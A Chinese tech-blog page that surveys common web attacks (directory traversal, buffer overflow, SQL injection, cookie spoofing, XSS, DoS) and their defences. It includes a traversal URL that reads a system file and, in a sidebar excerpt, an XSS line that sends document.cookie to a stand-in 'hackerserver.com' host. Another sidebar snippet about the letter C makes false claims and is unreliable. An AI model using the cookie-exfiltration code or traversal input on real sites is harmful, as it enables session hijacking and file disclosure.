Web攻击

最新推荐文章于 2023-12-14 17:34:24 发布
最新推荐文章于 2023-12-14 17:34:24 发布
阅读量829 收藏 1
点赞数
分类专栏: 测试基础 文章标签: web

https://blog.csdn.net/xsyu_liuyan/article/details/62418223
https://www.zhihu.com/question/22953267/answer/80141632

服务器漏洞:
1)缓冲区溢出
2)目录遍历

网页漏洞:
1)伪造cookies
2)强制访问
3)拒绝服务DDOS
4)SQL注入
5)跨站脚本攻击XSS

目录遍历

一. 什么是目录遍历漏洞

目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web根目录以外的文件),甚至执行系统命令。

二. 目录遍历漏洞原理

程序在实现上没有充分过滤用户输入的../之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件。

三. 目录遍历漏洞实例

读取文件的url:

http://www.test.com/my.jsp?file=abc.html

恶意url:

http://www.test.com/my.jsp?file=../../Windows.system.ini

四. 目录遍历漏洞的防御

1.对用户的输入进行验证,特别是路径替代字符“../”

2.尽可能采用白名单的形式,验证所有输入

3.合理配置web服务器的目录权限

4.程序出错时,不要显示内部相关细节

五.出现场景

出现在文件读取或者展示图片等对文件读取交互的功能块。

缓冲区溢出

缓冲区溢出攻击是利用缓冲区溢出漏洞所进行的攻击行动

如果有人利用栈中分配的缓冲区写溢出,悄悄地将一段恶意代码的首地址作为返回地址覆盖写到原先的正确的返回地址处。那么程序在执行ret的时候会悄悄地转移到这个恶意代码段处执行,从而可以轻易获得系统特权,进而进行各种非法操作

造成缓冲区溢出的原因:

系统没有对作为缓冲区的数组进行越界检查

缓冲区溢出带来的危害:

缓冲区溢出中,最为危险的是堆栈溢出,因为入侵者可以利用堆栈溢出,在函数返回时改变返回程序的地址,让其跳转到任意地址,带来的危害一种是程序崩溃导致拒绝服务,另外一种就是跳转并且执行一段恶意代码,比如得到系统权限,然后为所欲为。

利用缓冲区溢出攻击,可以导致程序运行失败、系统宕机、重新启动等后果。更为严重的是,它可被利用来执行非授权指令,甚至可以取得系统特权,进而进行各种非法操作。

SQL注入

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。

比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击.

SQL注入的产生原因通常表现在以下几方面:
①不当的类型处理;
②不安全的数据库配置;
③不合理的查询集处理;
④不当的错误处理;
⑤转义字符处理不合适;
⑥多个提交处理不当。

预防SQL注入:

1、检查变量数据类型和格式

如果你的SQL语句是类似where id={$id}这种形式,数据库里所有的id都是数字,那么就应该在SQL被执行前,检查确保变量id是int类型;如果是接受邮箱,那就应该检查并严格确保变量一定是邮箱的格式,其他的类型比如日期、时间等也是一个道理。

2、过滤特殊符号

对于无法确定固定格式的变量,一定要进行特殊符号过滤或转义处理。以PHP为例,通常是采用addslashes函数,它会在指定的预定义字符前添加反斜杠转义,这些预定义的字符是:单引号 (‘) 双引号 (“) 反斜杠 () NULL。

3、绑定变量,使用预编译语句

小结
1、不要随意开启生产环境中Webserver的错误显示。
2、永远不要信任来自用户端的变量输入,有固定格式的变量一定要严格检查对应的格式,没有固定格式的变量需要对引号等特殊字符进行必要的过滤转义。
3、使用预编译绑定变量的SQL语句。
4、做好数据库帐号权限管理。
5、严格加密处理用户的机密信息。

cookies欺骗

Cookies欺骗是通过盗取、修改、伪造Cookies的内容来欺骗Web系统,并得到相应权限或者进行相应权限操作的一种攻击方式。

欺骗方法:

1、跳过浏览器,直接对通讯数据改写
2、修改浏览器,让浏览器从本地可以读写任意域名cookie
3、使用签名脚本,让浏览器从本地可以读写任意域名cookie(有安全问题)
4、欺骗浏览器,让浏览器获得假的域名

其中:
方法1、2需要较专业的编程知识,对普通用户不太合适。
方法3的实现有2种方法:
1、直接使用签名脚本,不需要签名验证,但是产生很严重的安全问题,因为大家都要上网的,如果这样做你的硬盘文件就……
2、对脚本进行签名后再使用签名脚本,但是需要专用的数字签名工具,对普通用户也不合适。
方法4看样子应该是最合适的了,域名欺骗很简单,也不需要什么工具(当然如果你的机器装有web服务器那更好了)。

注:我们讨论的cookie是那种不会在硬盘的cookie文件里留下踪迹的cookie,就是那种只在浏览器生存周期内(会话)产生的cookie,如果浏览器关闭(会话结束)那么这个cookie就被删了!

预防cookies欺骗:

1)不要在公共场登陆 自己重要的用户名和密码; 不用的时候,【关闭浏览器】,只点【退出】,还是会有安全隐患。
2)cookie加密, 加密虽然看不懂cookie,但根本就不需要知道cookie是什么含义,请求的时候把【截取】到的cookie放入请求,则就可以绕过后台的判断,获取真实用户的信息,所以单纯加密无用。
3)cookie+ip等信息加密,可以抵挡大多数的恶意攻击, 因为 虽然获取到了 cookiie ,但是 恶意者的ip不和真实用户的相同,则可以校验出来,防止欺骗。
4)cookie + ip + 动态:请求正确一次,就清空一次,再重新赋值一个 唯一标示,那么 就算别人 窃取到了 cookie,只有在【用户此次被获取cookie的请求与下次请求之前的时间,那个cookie才会起到欺骗效果。配合 ip等客户端的标示,可以避免 cookie欺骗】

跨站脚本攻击XSS

为了搜集用户信息,攻击者通常会在有漏洞的程序中插入 JavaScript、VBScript、 ActiveX或Flash以欺骗用户(详见下文)。一旦得手,他们可以盗取用户帐户,修改用户设置,盗取/污染cookie,做虚假广告等。每天都有大量的XSS攻击的恶意代码出现。

从网站开发者角度,如何防护XSS攻击?

来自应用安全国际组织OWASP的建议,对XSS最佳的防护应该结合以下两种方法:
1)验证所有输入数据,有效检测攻击;
2)对所有输出数据进行适当的编码,以防止任何已成功注入的脚本在浏览器端运行。

具体如下:
输入验证:某个数据被接受为可被显示或存储之前,使用标准输入验证机制,验证所有输入数据的长度、类型、语法以及业务规则。
输出编码:数据输出前,确保用户提交的数据已被正确进行entity编码,建议对所有字符进行编码而不仅局限于某个子集。
明确指定输出的编码方式:不要允许攻击者为你的用户选择编码方式(如ISO 8859-1或 UTF 8)。
注意黑名单验证方式的局限性:仅仅查找或替换一些字符(如”<” “>”或类似”script”的关键字),很容易被XSS变种攻击绕过验证机制。
警惕规范化错误:验证输入之前,必须进行解码及规范化以符合应用程序当前的内部表示方法。请确定应用程序对同一输入不做两次解码。

从网站用户角度,如何防护XSS攻击?

当你打开一封Email或附件、浏览论坛帖子时,可能恶意脚本会自动执行,因此,在做这些操作时一定要特别谨慎。建议在浏览器设置中关闭JavaScript。如果使用IE浏览器,将安全级别设置到“高”

这里需要再次提醒的是,XSS攻击其实伴随着社会工程学的成功应用,需要增强安全意识,只信任值得信任的站点或内容。可以通过一些检测工具进行xss的漏洞检测,类似工具有亿思网站安全检测平台。针对xss的漏洞带来的危害是巨大,如有发现,应立即修复漏洞

拒绝服务

拒绝服务(英文名称denial of service;DoS)是指通过向服务器发送大量垃圾信息或干扰信息的方式,导致服务器无法向正常用户提供服务的现象。

攻击原理:

所谓的拒绝服务攻击就是通过占满服务器的所有服务线程或者网络带宽,导致正常的服务请求无法得到响应,致使服务器处于瘫痪的状态。DoS攻击一般是针对WWW服务器,SMTP服务器等。众所周知,正常的一次TCP会话首先通过三次协商握手才能完成,首先客户机向目标服务器发送带有SYN的会话请求,然后服务器向客户机向客户机发送回复消息,最后还需客户机再回送一个确认消息。如果客户机发送的请求包里面的源IP地址是不可达的IP地址,那么服务器发出的回复消息将永远得不到确认,此时服务器一位是网络拥塞等问题,一直再等待确认消息和重发回消息,而且时间周期越来越长。试想如果客户机发送大量的这样的无效请求,那么服务器的服务线程就会瞬时被占满。

攻击方式:

最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。

1、带宽攻击。带宽攻击指以极大的通信量冲击网络,使得所有可用网络资源都被消耗殆尽,最后导致合法的用户请求无法通过。
2、连通性攻击。连通性攻击指用大量的连接请求冲击计算机,使得所有可用的操作系统资源都被消耗殆尽,最终计算机无法再处理合法用户的请求。常用的攻击手段有:同步洪流、Land攻击、Ping洪流、UDP攻击、OOB等。

防范措施:

1、防止此类攻击的一种方法是实现DNSSEC,验证DNS请求源的身份。但旧的DNS基础架构很难改变。现在,推出了虚拟DNS服务,为域名解析服务器提供基于云端的DNS查询和缓存代理服务,验证请求源的身份。
2、防火墙防御。防火墙是防御DoS攻击最有效的方法。目前很多厂商的防火墙都注入了专门针对DoS攻击的功能。现在防火墙中防御DoS攻击的主流技术主要有两种:连接监控和同步网关。
3、路由器防御。路由器作为整个互联网的组网设备,可以通过路由器一些访问控制和QoS设置功能来达到防御DoS的目的。
4、系统防御。每个操作系统都有一些参数用来设置TCP/IP的运行性能,修改这些参数用来防御DoS也有一定效果,但是这只是辅助措施。

这里写图片描述

ka_ko
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WEB攻击介绍
03-29
web攻击介绍,讲述web攻击的基本教程
【xss】攻击
qq_32265719的博客
10-15 166
xss sql注入攻击服务器和数据库 Click劫持 相对链接劫持 // js 层面 xss 攻击代码 列如 var i=document.createElement("img"); document.body.appendChild(i); i.src = "http://www.hackerserver.com/?c=" + document.cookie; 方案 1...
【网络安全/前端XSS防护】一文带你了解HTML的特殊字符转义及编码
等风来
08-25 8984
在 HTML 中,有一些特殊字符不可直接使用,需要使用转义字符或实体编码来表示。这是为了避免这些字符与 HTML 标签和语法产生冲突。同时,也是为了防范前端XSS。 例如,有些特殊字符(如 < 和 >)作为HTML标签的一部分,要是没有被特殊处理可能被恶意XSS。HTML的特殊字符转义及编码在防范跨站脚本攻击(Cross-Site Scripting, XSS)方面起到关键作用。XSS是一种常见的安全漏洞,攻击者通过在受信任网站上插入恶意脚本,使其在用户浏览器中执行。
特殊字符:安全攻防中容易遗漏的细节
华为云官方博客
12-14 270
针对特殊字符校验的背景、原则、指导做了总结,以及对半/全角、回车/换行符易混淆字符的区分做了实战验证。
应用安全系列之十七:xQuery注入
jimmyleeee的专栏
03-12 489
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施。 关于xQuery标准的详细信息可以参考http://www.w3.org/TR/xquery/, 这里只做简单介绍。 XQuery语言是用于查询存储在XML数据库的数据的语言,它可以看做是XPath语言的一个超集。主要用到的XQuery的功能包括: 构建XQL查询 从XML数据库获取信息给web服务或者应用 从XML数据库中年获取XML格式的报告 把XML数据转换成XHTML 快速遍历XML树 根据过滤器过滤..
目录穿越及文件包含漏洞
weixin_45007073的博客
01-31 7221
目录穿越概念 目录穿越(Directory Traversal)攻击是黑客能够在Web应用程序所在的根目录以外的文件夹上,任意地存取被限制的文件夹、执行命令或查找数据。目录穿越攻击,也有人称为Path Traversal攻击。 目录穿越的漏洞危害 攻击者可以使用目录穿越攻击来查找、执行或存取Web应用程序所在的根目录以外的文件夹。如果目录穿越攻击成功,黑客就可以执行破坏性的命令来攻击网站 文件操作漏洞的分类 代码展示 先来简单展示一下目录穿越的原理,先在当前目录下新建一个file文件夹,里面建一个1.tx
1-Web安全——命令执行注入攻击
网络安全
09-06 6935
1. 系统命令执行 通常在程序开发过程中,应用程序需要调用一些外部程序时会用到一些系统命令相关函数。 例如在linux系统中,shell解释器就是用户和系统进行交互的一个接口,对用户的输入进行解析并在系统中执行。而shell脚本语言就是linux系统由各种shell命令组成的程序,具有其他普通编程的很多特点。 2. Web命令执行 常用的ASP,PHP,JSP等web脚本解释语言支持动态执行在运行时生成的代码这种特点,可以帮助开发者根据各种数据和条件动态修改程序代码,这对于开发人员来说是有利的.
常见的Web漏洞分析(上)
伤心的辣条
04-18 93
不断地去试用户名和密码,直到试出来。
Web 安全漏洞之目录遍历
GJ_ia的博客
01-14 503
第一次接触到目录遍历漏洞还是在 ThinkJS 2 的时候。代码如下图,目的是当用户访问的 URL 是静态资源的时候返回静态资源的地址。其中pathname就是用户访问的 URL 中的路径,我们发现代码中只是简单的解码之后就在22行将其与资源目录做了拼接,这就是非常明显的目录遍历漏洞了。为什么这么说呢?假设用户访问的 URL 是的话最终返回的文件地址就会变成的上三层目录中的文件了。
常见的Web攻击.md
借你一秒
05-06 3141
1.ZIP炸弹 zip炸弹就是一个高压缩比的zip文件,它本身可能只有几M或几十M的大小,但是解压缩之后会产生巨大的数据量,会解压到几十G的大小甚至更大,这种zip文件会对解压缩的系统造成严重的资源负担,影响目标系统业务甚至达到使系统崩溃的结果。 防范校验,步骤如下: 第一步,校验ZIP压缩包大小。 第二步,校验ZIP压缩包解压后的大小。 参考文档:zip炸弹和跨目录zip文件的构造 2.zi...
Web攻击与防护
11-06
在早期的互联网中,web并非主流的互联网应用,相对来说,给予SMTP、POP3、FTP、IRC等协议的用户拥有绝大数的用户,因此黑客们攻击的主要目标就是网络、操作系统以及软件的领域,WEB安全领域的攻击防御与技术均处于...
web攻击.pdf
04-21
web应用攻击技术,ppt。有需要的可以下载使用参考。。。
利用ASP.NET的内置功能抵御Web攻击
02-27
摘要:Dino总结了最常见的Web攻击类型,并介绍了Web开发人员可以如何使用ASP.NET的内置功能来改进安全性。本页内容ASP.NET开发人员应当始终坚持的做法威胁的来源ViewStateUserKeyCookie和身份验证会话劫持...
Web攻击检测与分类识别数据集
08-30
某业务平台平均每月捕获到Web攻击数量超过2亿,涉及常见注入攻击,代码执行等类型。传统威胁检测手段通过分析已知攻击特征进行规则匹配,无法检测未知漏洞或攻击手法。如何快速准确地识别未知威胁攻击并且将不同攻击...
企业数字化转型暨数据仓库(数仓)建设方案.pptx
05-06
企业数字化转型暨数据仓库(数仓)建设方案.pptx
2024年中国LED切割灯行业研究报告.docx
05-06
2024年中国LED切割灯行业研究报告
目前世界上最好的机器学习&深度学习&神经网络&图神经网络&卷积网络&多层感知机画图工具&基于PPT
05-06
在当今快速发展的人工智能领域中,一款集成了机器学习、深度学习、神经网络、图神经网络、卷积网络及多层感知机可视化功能的画图工具脱颖而出,成为全球范围内最受欢迎和认可的工具之一。这款工具不仅仅是一个简单的绘图软件,它的设计初衷是为了让复杂的网络结构和算法直观化,从而帮助研究者、学者及开发人员更容易地理解和分享他们的工作。 最令人印象深刻的特色之一是它基于PPT的编辑能力,这允许用户在熟悉的PPT编辑环境中创建、编辑和展示复杂的网络结构。用户可以利用拖拉组件、调整尺寸、修改颜色和形状等功能,无缝地将科研成果或项目展示集成到演示文稿中,极大地提高了工作的效率和表现力。 该工具不仅支持广泛的网络结构和模型,还包含丰富的库和模块,让用户能够轻松自定义和扩展自己的模型。它的用户界面友好、直观,无论是机器学习的新手还是资深研究员,都能快速上手,将精力更多地集中在创新和研究上,而不是图形的绘制和编辑上。 此外,它强大的共享和合作功能,使得团队成员可以实时共享他们的成果,促进了知识的交流和项目的进展。这款工具不仅改善了人工智能领域内部的工作方式,也为更广泛的受众提供了学习和理解复杂算法的窗口。 总
2024年中国B型超声诊断设备行业研究报告.docx
05-06
2024年中国B型超声诊断设备行业研究报告
node-v11.0.0-linux-armv7l.tar.xz
最新发布
05-06
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
c#ai web攻击识别
01-05
这个问题非常简短,因此我的回答也会简单明了。在中文中,字母c可以有以下几个意思: 1. C 可以是阿拉伯数字中的100,是一个整数的代表。 2. C 也可以是拉丁字母表中的一个字母,是英语中的第三个字母。它在一些词语中有着不同的用途,例如: - 在科学中,C常常被用作表示摄氏度的符号,例如摄氏度(℃)就是用C表示的。 - 在计算机科学中,C是一种编程语言的名称。它是一种通用的高级编程语言,广泛用于开发各种应用程序。 - 在化学中,C是碳元素的化学符号,是地球上许多物质的基础。 - 在音乐中,C是一个音符,代表着中央C音。 - 在体育中,C是一些体育俱乐部的名称中的一个字母,代表着Club或者是Captain。 - 在商业中,C经常被使用来表示货币单位(如美元)中的一个符号。 总之,字母C在不同的领域中有着不同的含义。它可以是数字100的代表,也可以是英语字母表中的一个字母,在不同的词语和领域中有着各种用途。无论是作为符号、元素名称还是在特定名词中,字母C在汉语和英语中都有着重要的意义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值